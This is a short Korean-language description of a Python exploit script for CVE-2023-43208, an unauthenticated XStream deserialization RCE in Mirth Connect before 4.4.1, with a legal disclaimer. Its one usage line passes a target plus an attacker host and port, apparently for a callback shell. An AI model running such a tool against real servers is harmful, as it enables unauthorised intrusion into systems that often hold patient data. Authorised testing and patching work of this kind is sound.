
Python으로 구현된 CVE-2023-43208 Mirth Connect RCE(인증 없음 XStream)
이 익스플로잇은 Mirth Connect의 XStream 엔진 내 심각한 역직렬화 취약점을 활용합니다. 이는 CVE-2023-37679에 대한 불완전한 패치에서 비롯된 것으로, 4.4.1 이전의 모든 버전에서 인증되지 않은 임의 코드 실행을 가능하게 합니다.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
이 익스플로잇 스크립트는 CVE-2023-43208을 완화하는 데 있어 방어자를 지원하기 위한 교육 목적 및 공인된 보안 감사 용도로만 제공됩니다. 승인되지 않은 대상을 대상으로 이 도구를 사용하는 것은 불법이며 전적으로 최종 사용자의 책임입니다. 저자는 이 소프트웨어를 어떠한 보증 없이 "있는 그대로" 제공하며, 잠재적인 오용이나 손해에 대한 모든 책임을 부인하고, 승인되지 않은 활동을 묵인하거나 장려하지 않습니다. 사용에 따른 위험은 본인이 부담하며, 관련 법률을 준수하는 경우에만 사용하십시오.